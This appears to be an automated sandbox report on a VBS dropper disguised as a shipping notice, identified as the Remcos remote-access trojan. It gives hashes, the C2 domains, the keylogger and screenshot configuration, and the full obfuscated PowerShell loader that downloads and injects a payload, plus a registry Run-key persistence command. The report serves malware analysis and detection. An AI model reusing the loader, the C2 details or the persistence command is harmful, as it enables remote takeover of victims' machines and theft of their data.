Overview

overview

10

Static

static

1

awb_shippi...24.vbs

windows7-x64

10

awb_shippi...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    56s
  • max time network
    57s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 07:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs

  • Size

    29KB

  • MD5

    2bd1468a7b92abec901b765e0096bb54

  • SHA1

    e82a0cf23beaf7b9082713f8c35bfbbac5aa9578

  • SHA256

    1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8

  • SHA512

    2a69b75c1d978394b8aa50e68359c7df7b5f65c0df410e2051bb71f4e7ae5d630d9d243e700cf11a156aef508613e15086a973f2cf218da653de80f2c0de0847

  • SSDEEP

    192:CBH/B1eRFrh86O1oFnZS1VvttRSPQUmKGTT3I8eEnUxMPzduNZQ7ilOHVMp4Vm5D:+a7VQ9jTbX3RM5wiz9g93U4j4bw4TZ02

Score
10/10
remcosa$iandiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-CR733Q

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs"
    1⤵
    • Blocklisted process makes network request
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2808
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2672

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    bb874875e09cccfff66b48b2e4d7a4f0

    SHA1

    8e746fb2fa038a018a7826666470f8a9521f80e1

    SHA256

    9b68c356b0ad1b2cbe8ac15021009deb4193f849b4d2ef8656a98bac4b0985f4

    SHA512

    3fcc1bc3ef8a5b9720c82121a160bd0ca741c295e985e568d25585be208cc51a5aaa276cae2b498b5af90ae10ba066712234518ac84c86f5a614261b0c43a285

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabE17B.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar4599.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Geografens.Mis
    Filesize

    421KB

    MD5

    213e02988b4d838fdbf175c96f49eefb

    SHA1

    29190ed3fd5aa65328b312cfa952a95c752297b0

    SHA256

    1d198b573d3f3715ab7066d7d42eb11c0f69c542d055f6f73abc5cc4d7b82429

    SHA512

    b815a41b58ff9d204f53d2ee8fca3327f916b0b0d65c154a59a0b46026ad6a3784b074cc361be3535e3b421ef8e4b2cf4b222050f9f1b3a15481f1d2fe6bb55a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G3BB0ZR96UBCQZFC13LQ.temp
    Filesize

    7KB

    MD5

    c77de26b4e565a84872e182fffd31904

    SHA1

    55471497335000342333e1a798583bce99081eb5

    SHA256

    37c006544bfe7b5028c4b90b172c78039b489dc1a01dd2981e6e5befbebf2dbb

    SHA512

    6cce0f9e2959af3bd87554a3db7a6ed522625b91046484bf5659628e737fc5952057e049e9ba658c15ea8a31abe7f9012a05c1fbe51d28311261e34a8f283f12

    Download Submit

  • memory/2072-56-0x0000000000180000-0x00000000011E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2072-53-0x0000000000180000-0x00000000011E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2768-35-0x0000000006540000-0x000000000A735000-memory.dmp

    Filesize

    66.0MB

    Download

  • memory/2808-23-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-29-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-31-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-24-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-25-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-26-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-27-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2808-21-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2808-20-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

    Filesize

    4KB

    Download